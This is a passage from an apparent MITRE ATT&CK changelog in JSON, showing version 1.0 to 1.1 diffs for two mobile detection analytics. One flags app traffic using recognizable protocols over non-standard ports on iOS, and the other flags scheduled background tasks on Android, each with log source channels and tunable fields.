class=\"diff_sub\">tion&nbsp;vetting&nbsp;reports&nbsp;may&nbsp;show&nbsp;network&nbsp;communications&nbsp;perform</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">d&nbsp;header&nbsp;patterns,&nbsp;DNS&nbsp;semantics,&nbsp;or&nbsp;other&nbsp;application-layer</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">ed&nbsp;by&nbsp;the&nbsp;application,&nbsp;including&nbsp;hosts,&nbsp;ports,&nbsp;protocols,&nbsp;an</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">&nbsp;characteristics&nbsp;are&nbsp;observed&nbsp;over&nbsp;a&nbsp;destination&nbsp;port&nbsp;outsid</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">d&nbsp;URLs.&nbsp;Further&nbsp;detection&nbsp;would&nbsp;most&nbsp;likely&nbsp;be&nbsp;at&nbsp;the&nbsp;enterp</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">e&nbsp;the&nbsp;approved&nbsp;baseline&nbsp;for&nbsp;that&nbsp;protocol&nbsp;and&nbsp;app&nbsp;role.&nbsp;The&nbsp;</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">rise&nbsp;level,&nbsp;through&nbsp;packet&nbsp;and/or&nbsp;netflow&nbsp;inspection.&nbsp;</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">strongest&nbsp;Android&nbsp;evidence&nbsp;is&nbsp;repeated&nbsp;or&nbsp;persistent&nbsp;app-att</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ributed&nbsp;traffic&nbsp;using&nbsp;HTTPS-,&nbsp;HTTP-,&nbsp;DNS-,&nbsp;WebSocket-,&nbsp;or&nbsp;ot</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">her&nbsp;recognizable&nbsp;application&nbsp;behavior&nbsp;over&nbsp;uncommon&nbsp;destinat</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ion&nbsp;ports,&nbsp;especially&nbsp;when&nbsp;the&nbsp;app&nbsp;is&nbsp;backgrounded,&nbsp;while&nbsp;th</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">e&nbsp;device&nbsp;is&nbsp;locked,&nbsp;without&nbsp;recent&nbsp;user&nbsp;interaction,&nbsp;or&nbsp;when</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">&nbsp;the&nbsp;app&nbsp;is&nbsp;unmanaged&nbsp;or&nbsp;not&nbsp;approved&nbsp;for&nbsp;that&nbsp;protocol-to-p</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ort&nbsp;pairing.</span></td></tr>\n        </tbody>\n    </table>"
                },
                {
                    "type": "x-mitre-analytic",
                    "id": "x-mitre-analytic--7c96d701-391d-4904-b6ba-941344aaf059",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2025-10-21 15:10:28.402000+00:00",
                    "modified": "2026-03-19 19:41:30.977000+00:00",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/detectionstrategies/DET0706#AN1828",
                            "external_id": "AN1828"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "name": "Analytic 1828",
                    "description": "The defender correlates managed-app or supervised-device outbound sessions where protocol indicators such as TLS handshake, HTTP semantics, or other application-layer behaviors are observed over destination ports outside the approved baseline for that protocol and bundle role. The strongest iOS evidence is network telemetry showing repeated or persistent sessions using recognizable application protocols over uncommon ports, particularly during background refresh, while the device is locked, or without recent user interaction. Because direct local runtime attribution is weaker than Android, the primary iOS analytic should be anchored on network protocol-versus-port mismatch plus supervised managed-app context and device-state enrichment.",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "mobile-attack"
                    ],
                    "x_mitre_log_source_references": [
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c",
                            "name": "VPN:MobileProxy",
                            "channel": "TLS handshake, HTTP method/header pattern, or WebSocket upgrade was observed on destination port outside approved port set for detected protocol during app-attributed outbound session"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c",
                            "name": "VPN:MobileProxy",
                            "channel": "Repeated app-attributed sessions to same destination or service class used non-standard destination port with stable recurrence interval or persistent connection behavior"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c",
                            "name": "VPN:MobileProxy",
                            "channel": "Observed protocol-to-port pairing was outside approved mapping for managed bundle or service class and did not match enterprise proxy, relay, or developer tooling exception"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--55c669d9-b42a-4cf6-a38a-07161b228ce9",
                            "name": "MobileEDR:telemetry",
                            "channel": "DeviceLockState=locked during outbound session using non-standard protocol-to-port pairing"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--55c669d9-b42a-4cf6-a38a-07161b228ce9",
                            "name": "MobileEDR:telemetry",
                            "channel": "LastUserInteractionDelta exceeded threshold before app-attributed session using non-standard protocol-to-port pairing"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43",
                            "name": "iOS:MDMLog",
                            "channel": "App identity using non-standard protocol-to-port pairing was unmanaged, outside approved app baseline, or not permitted to communicate using detected protocol/service over observed destination port"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e",
                            "name": "MobileEDR:telemetry",
                            "channel": "Background work scheduler, job execution, foreground-service start, or persistent service activation immediately preceded outbound session using non-standard protocol-to-port pairing"
                        }
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_mutable_elements": [
                        {
                            "field": "AllowedProtocolPortMappings",
                            "description": "Approved protocol-to-port pairings vary by bundle, business workflow, proxy architecture, and enterprise policy."
                        },
                        {
                            "field": "SupervisedRequired",
                            "description": "Strongest bundle-governance and protocol-port baseline analytics depend on supervised iOS devices."
                        },
                        {
                            "field": "AllowedManagedApps",
                            "description": "Approved managed bundle identities vary by organization and device profile."
                        },
                        {
                            "field": "AllowedServiceClasses",
                            "description": "Expected external service classes differ across managed app categories and enterprise mobile workflows."
                        },
                        {
                            "field": "TimeWindow",
                            "description": "Correlation window linking non-standard-port sessions with lifecycle or local context signals."
                        },
                        {
                            "field": "RecentUserInteractionWindow",
                            "description": "Defines how close a session must be to user activity to be considered expected."
                        },
                        {
                            "field": "BeaconIntervalTolerance",
                            "description": "Allowed recurrence interval for benign polling, sync, or persistent sessions differs by bundle type."
                        },
                        {
                            "field": "EnterpriseExceptionList",
                            "description": "Known enterprise proxies, relays, developer tooling, and security products may legitimately use uncommon ports."
                        }
                    ],
                    "x_mitre_platforms": [
                        "iOS"
                    ],
                    "x_mitre_version": "1.1",
                    "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_mutable_elements']\": [{\"field\": \"AllowedProtocolPortMappings\", \"description\": \"Approved protocol-to-port pairings vary by bundle, business workflow, proxy architecture, and enterprise policy.\"}, {\"field\": \"SupervisedRequired\", \"description\": \"Strongest bundle-governance and protocol-port baseline analytics depend on supervised iOS devices.\"}, {\"field\": \"AllowedManagedApps\", \"description\": \"Approved managed bundle identities vary by organization and device profile.\"}, {\"field\": \"AllowedServiceClasses\", \"description\": \"Expected external service classes differ across managed app categories and enterprise mobile workflows.\"}, {\"field\": \"TimeWindow\", \"description\": \"Correlation window linking non-standard-port sessions with lifecycle or local context signals.\"}, {\"field\": \"RecentUserInteractionWindow\", \"description\": \"Defines how close a session must be to user activity to be considered expected.\"}, {\"field\": \"BeaconIntervalTolerance\", \"description\": \"Allowed recurrence interval for benign polling, sync, or persistent sessions differs by bundle type.\"}, {\"field\": \"EnterpriseExceptionList\", \"description\": \"Known enterprise proxies, relays, developer tooling, and security products may legitimately use uncommon ports.\"}]}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-03-19 19:41:30.977000+00:00\", \"old_value\": \"2025-10-21 15:10:28.402000+00:00\"}, \"root['description']\": {\"new_value\": \"The defender correlates managed-app or supervised-device outbound sessions where protocol indicators such as TLS handshake, HTTP semantics, or other application-layer behaviors are observed over destination ports outside the approved baseline for that protocol and bundle role. The strongest iOS evidence is network telemetry showing repeated or persistent sessions using recognizable application protocols over uncommon ports, particularly during background refresh, while the device is locked, or without recent user interaction. Because direct local runtime attribution is weaker than Android, the primary iOS analytic should be anchored on network protocol-versus-port mismatch plus supervised managed-app context and device-state enrichment.\", \"old_value\": \"Many properly configured firewalls may also naturally block command and control traffic over non-standard ports.\\nApplication vetting reports may show network communications performed by the application, including hosts, ports, protocols, and URLs. Further detection would most likely be at the enterprise level, through packet and/or netflow inspection. \", \"diff\": \"--- \\n+++ \\n@@ -1,2 +1 @@\\n-Many properly configured firewalls may also naturally block command and control traffic over non-standard ports.\\n-Application vetting reports may show network communications performed by the application, including hosts, ports, protocols, and URLs. Further detection would most likely be at the enterprise level, through packet and/or netflow inspection. \\n+The defender correlates managed-app or supervised-device outbound sessions where protocol indicators such as TLS handshake, HTTP semantics, or other application-layer behaviors are observed over destination ports outside the approved baseline for that protocol and bundle role. The strongest iOS evidence is network telemetry showing repeated or persistent sessions using recognizable application protocols over uncommon ports, particularly during background refresh, while the device is locked, or without recent user interaction. Because direct local runtime attribution is weaker than Android, the primary iOS analytic should be anchored on network protocol-versus-port mismatch plus supervised managed-app context and device-state enrichment.\"}, \"root['x_mitre_version']\": {\"new_value\": \"1.1\", \"old_value\": \"1.0\"}, \"root['x_mitre_log_source_references'][0]\": {\"new_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c\", \"name\": \"VPN:MobileProxy\", \"channel\": \"TLS handshake, HTTP method/header pattern, or WebSocket upgrade was observed on destination port outside approved port set for detected protocol during app-attributed outbound session\"}, \"old_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--a7f22107-02e5-4982-9067-6625d4a1765a\", \"name\": \"Network Traffic\", \"channel\": \"None\"}}, \"root['x_mitre_log_source_references'][1]\": {\"new_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c\", \"name\": \"VPN:MobileProxy\", \"channel\": \"Repeated app-attributed sessions to same destination or service class used non-standard destination port with stable recurrence interval or persistent connection behavior\"}, \"old_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--764ee29e-48d6-4934-8e6b-7a606aaaafc0\", \"name\": \"Application Vetting\", \"channel\": \"None\"}}}, \"iterable_item_added\": {\"root['x_mitre_log_source_references'][2]\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c\", \"name\": \"VPN:MobileProxy\", \"channel\": \"Observed protocol-to-port pairing was outside approved mapping for managed bundle or service class and did not match enterprise proxy, relay, or developer tooling exception\"}, \"root['x_mitre_log_source_references'][3]\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--55c669d9-b42a-4cf6-a38a-07161b228ce9\", \"name\": \"MobileEDR:telemetry\", \"channel\": \"DeviceLockState=locked during outbound session using non-standard protocol-to-port pairing\"}, \"root['x_mitre_log_source_references'][4]\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--55c669d9-b42a-4cf6-a38a-07161b228ce9\", \"name\": \"MobileEDR:telemetry\", \"channel\": \"LastUserInteractionDelta exceeded threshold before app-attributed session using non-standard protocol-to-port pairing\"}, \"root['x_mitre_log_source_references'][5]\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43\", \"name\": \"iOS:MDMLog\", \"channel\": \"App identity using non-standard protocol-to-port pairing was unmanaged, outside approved app baseline, or not permitted to communicate using detected protocol/service over observed destination port\"}, \"root['x_mitre_log_source_references'][6]\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e\", \"name\": \"MobileEDR:telemetry\", \"channel\": \"Background work scheduler, job execution, foreground-service start, or persistent service activation immediately preceded outbound session using non-standard protocol-to-port pairing\"}}}",
                    "previous_version": "1.0",
                    "version_change": "1.0 \u2192 1.1",
                    "description_change_table": "\n    <table class=\"diff\" id=\"difflib_chg_to92__top\"\n           cellspacing=\"0\" cellpadding=\"0\" rules=\"groups\" >\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <thead><tr><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">Old Description</th><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">New Description</th></tr></thead>\n        <tbody>\n            <tr><td class=\"diff_next\" id=\"difflib_chg_to92__0\"><a href=\"#difflib_chg_to92__top\">t</a></td><td class=\"diff_header\" id=\"from92_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_sub\">Many&nbsp;properly&nbsp;configured&nbsp;firewalls&nbsp;may&nbsp;also&nbsp;naturally&nbsp;block&nbsp;</span></td><td class=\"diff_next\"><a href=\"#difflib_chg_to92__top\">t</a></td><td class=\"diff_header\" id=\"to92_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_add\">The&nbsp;defender&nbsp;correlates&nbsp;managed-app&nbsp;or&nbsp;supervised-device&nbsp;out</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">command&nbsp;and&nbsp;control&nbsp;traffic&nbsp;over&nbsp;non-standard&nbsp;ports.&nbsp;Applica</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">bound&nbsp;sessions&nbsp;where&nbsp;protocol&nbsp;indicators&nbsp;such&nbsp;as&nbsp;TLS&nbsp;handsha</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">tion&nbsp;vetting&nbsp;reports&nbsp;may&nbsp;show&nbsp;network&nbsp;communications&nbsp;perform</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ke,&nbsp;HTTP&nbsp;semantics,&nbsp;or&nbsp;other&nbsp;application-layer&nbsp;behaviors&nbsp;are</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">ed&nbsp;by&nbsp;the&nbsp;application,&nbsp;including&nbsp;hosts,&nbsp;ports,&nbsp;protocols,&nbsp;an</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">&nbsp;observed&nbsp;over&nbsp;destination&nbsp;ports&nbsp;outside&nbsp;the&nbsp;approved&nbsp;baseli</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">d&nbsp;URLs.&nbsp;Further&nbsp;detection&nbsp;would&nbsp;most&nbsp;likely&nbsp;be&nbsp;at&nbsp;the&nbsp;enterp</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ne&nbsp;for&nbsp;that&nbsp;protocol&nbsp;and&nbsp;bundle&nbsp;role.&nbsp;The&nbsp;strongest&nbsp;iOS&nbsp;evid</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">rise&nbsp;level,&nbsp;through&nbsp;packet&nbsp;and/or&nbsp;netflow&nbsp;inspection.&nbsp;</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ence&nbsp;is&nbsp;network&nbsp;telemetry&nbsp;showing&nbsp;repeated&nbsp;or&nbsp;persistent&nbsp;ses</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">sions&nbsp;using&nbsp;recognizable&nbsp;application&nbsp;protocols&nbsp;over&nbsp;uncommon</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">&nbsp;ports,&nbsp;particularly&nbsp;during&nbsp;background&nbsp;refresh,&nbsp;while&nbsp;the&nbsp;de</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">vice&nbsp;is&nbsp;locked,&nbsp;or&nbsp;without&nbsp;recent&nbsp;user&nbsp;interaction.&nbsp;Because&nbsp;</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">direct&nbsp;local&nbsp;runtime&nbsp;attribution&nbsp;is&nbsp;weaker&nbsp;than&nbsp;Android,&nbsp;the</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">&nbsp;primary&nbsp;iOS&nbsp;analytic&nbsp;should&nbsp;be&nbsp;anchored&nbsp;on&nbsp;network&nbsp;protocol</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">-versus-port&nbsp;mismatch&nbsp;plus&nbsp;supervised&nbsp;managed-app&nbsp;context&nbsp;an</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">d&nbsp;device-state&nbsp;enrichment.</span></td></tr>\n        </tbody>\n    </table>"
                },
                {
                    "type": "x-mitre-analytic",
                    "id": "x-mitre-analytic--07c399a0-e5ad-462d-99b9-f51ce8aa5061",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2025-10-21 15:10:28.402000+00:00",
                    "modified": "2026-04-09 17:06:45.192000+00:00",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/detectionstrategies/DET0707#AN1829",
                            "external_id": "AN1829"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "name": "Analytic 1829",
                    "description": "The defender correlates creation or registration of deferred, repeating, or constraint-based background work with later task execution in the same app context, especially when the task executes without recent user interaction, from background state, or with follow-on file, sensor, or network behavior inconsistent with the app's declared role. The analytic prioritizes Android-observable control-plane effects: WorkManager enqueue operations, JobScheduler or AlarmManager scheduling, later wake or execution of the scheduled work, and post-trigger activity such as network sessions, local staging, or sensor access.",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "mobile-attack"
                    ],
                    "x_mitre_log_source_references": [
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e",
                            "name": "MobileEDR:telemetry",
                            "channel": "Application enqueues WorkManager work request or schedules JobScheduler or AlarmManager task with delay, periodic interval, or execution constraints during the persistence/execution setup phase"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--f42df6f0-6395-4f0c-9376-525a031f00c3",
                            "name": "MobiledEDR:telemetry",
                            "channel": "Scheduled task execution creates cache, staged payload, local output, or collected data artifact immediately after wake or job trigger"
                        }
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_mutable_elements": [
                        {
                            "field": "TimeWindow",
                            "description": "Correlation window between task registration and later execution, and between execution and follow-on behavior"
                        },
                        {
                            "field": "AllowedAppList",
                            "description": "Apps legitimately expected to use WorkManager, JobScheduler, or AlarmManager such as mail, sync, backup, calendar, or enterprise management apps"
                        },
                        {
                            "field": "AllowedConstraintProfiles",
                            "description": "Expected charging, network, idle, or timing constraints for legitimate scheduled work"
                        },
                        {
                            "field": "AllowedScheduleIntervals",
                            "description": "Expected delay or periodic interval ranges for legitimate app behavior"
                        },
                        {
                            "field": "ForegroundStateRequired",
                            "description": "Whether follow-on activity from a scheduled task should only occur during active user-driven workflows for a given app"
                        },
                        {
                            "field": "TriggerToNetworkWindow",
                            "description": "Maximum expected delay between scheduled job trigger and outbound communication"
                        },
                        {
                            "field": "UplinkBytesThreshold",
                            "description": "Minimum outbound volume after scheduled execution to treat network behavior as meaningful"
                        }
                    ],
                    "x_mitre_platforms": [
                        "Android"
                    ],
                    "x_mitre_version": "1.1",
                    "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_log_source_references']\": [{\"x_mitre_data_component_ref\": \"x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e\", \"name\": \"MobileEDR:telemetry\", \"channel\": \"Application enqueues WorkManager work request or schedules JobScheduler or AlarmManager task with delay, periodic interval, or execution constraints during the persistence/execution setup phase\"}, {\"x_mitre_data_component_ref\": \"x-mitre-data-component--f42df6f0-6395-4f0c-9376-525a031f00c3\", \"name\": \"MobiledEDR:telemetry\", \"channel\": \"Scheduled task execution creates cache, staged payload, local output, or collected data artifact immediately after wake or job trigger\"}], \"root['x_mitre_mutable_elements']\": [{\"field\": \"TimeWindow\", \"description\": \"Correlation window between task registration and later execution, and between execution and follow-on behavior\"}, {\"field\": \"AllowedAppList\", \"description\": \"Apps legitimately expected to use WorkManager, JobScheduler, or AlarmManager such as mail, sync, backup, calendar, or enterprise management apps\"}, {\"field\": \"AllowedConstraintProfiles\", \"description\": \"Expected charging, network, idle, or timing constraints for legitimate scheduled work\"}, {\"field\": \"AllowedScheduleIntervals\", \"description\": \"Expected delay or periodic interval ranges for legitimate app behavior\"}, {\"field\": \"ForegroundStateRequired\", \"description\": \"Whether follow-on activity from a scheduled task should only occur during active user-driven workflows for a given app\"}, {\"field\": \"TriggerToNetworkWindow\", \"description\": \"Maximum expected delay between scheduled job trigger and outbound communication\"}, {\"field\": \"UplinkBytesThreshold\", \"description\": \"Minimum outbound volume after scheduled execution to treat network behavior as meaningful\"}]}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-09 17:06:45.192000+00:00\", \"old_value\": \"2025-10-21 15:10:28.402000+00:00\"}, \"root['description']\": {\"new_value\": \"The defender correlates creation or registration of deferred, repeating, or constraint-based background work with later task execution in the same app context, especially when the task executes without recent user interaction, from background state, or with follow-on file, sensor, or network behavior inconsistent with the app's declared role. The analytic prioritizes Android-observable control-plane effects: WorkManager enqueue operations, JobScheduler or AlarmManager scheduling, later wake or execution of the scheduled work, and post-trigger activity such as network sessions, local staging, or sensor access.\", \"old_value\": \"Scheduling tasks/jobs can be difficult to detect, and therefore enterprises may be better served focusing on detection at other stages of adversarial behavior.\"}, \"root['x_mitre_version']\": {\"new_value\": \"1.1\", \"old_value\": \"1.0\"}}}",
                    "previous_version": "1.0",
                    "version_change": "1.0 \u2192 1.1",
                    "description_change_table": "\n    <table class=\"diff\" id=\"difflib_chg_to129__top\"\n           cellspacing=\"0\" cellpadding=\"0\" rules=\"groups\" >\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <thead><tr><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">Old Description</th><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">New Description</th></tr></thead>\n        <tbody>\n            <tr><td class=\"diff_next\" id=\"difflib_chg_to129__0\"><a href=\"#difflib_chg_to129__top\">t</a></td><td class=\"diff_header\" id=\"from129_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_sub\">Scheduling&nbsp;tasks/jobs&nbsp;can&nbsp;be&nbsp;difficult&nbsp;to&nbsp;detect,&nbsp;and&nbsp;theref</span></td><td class=\"diff_next\"><a href=\"#difflib_chg_to129__top\">t</a></td><td class=\"diff_header\" id=\"to129_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_add\">The&nbsp;defender&nbsp;correlates&nbsp;creation&nbsp;or&nbsp;registration&nbsp;of&nbsp;deferred</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">ore&nbsp;enterprises&nbsp;may&nbsp;be&nbsp;better&nbsp;served&nbsp;focusing&nbsp;on&nbsp;detection&nbsp;a</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">,&nbsp;repeating,&nbsp;or&nbsp;constraint-based&nbsp;background&nbsp;work&nbsp;with&nbsp;later&nbsp;</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">t&nbsp;other&nbsp;stages&nbsp;of&nbsp;adversarial&nbsp;behavior.</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">task&nbsp;execution&nbsp;in&nbsp;the&nbsp;same&nbsp;app&nbsp;context,&nbsp;especially&nbsp;when&nbsp;the&nbsp;</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">task&nbsp;executes&nbsp;without&nbsp;recent&nbsp;user&nbsp;interaction,&nbsp;from&nbsp;backgrou</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">nd&nbsp;state,&nbsp;or&nbsp;with&nbsp;follow-on&nbsp;file,&nbsp;sensor,&nbsp;or&nbsp;network&nbsp;behavio</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">r&nbsp;inconsistent&nbsp;with&nbsp;the&nbsp;app's&nbsp;declared&nbsp;role.&nbsp;The&nbsp;analytic&nbsp;pr</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ioritizes&nbsp;Android-observable&nbsp;control-plane&nbsp;effects:&nbsp;WorkMana</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ger&nbsp;enqueue&nbsp;operations,&nbsp;JobScheduler&nbsp;or&nbsp;AlarmManager&nbsp;schedul</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td 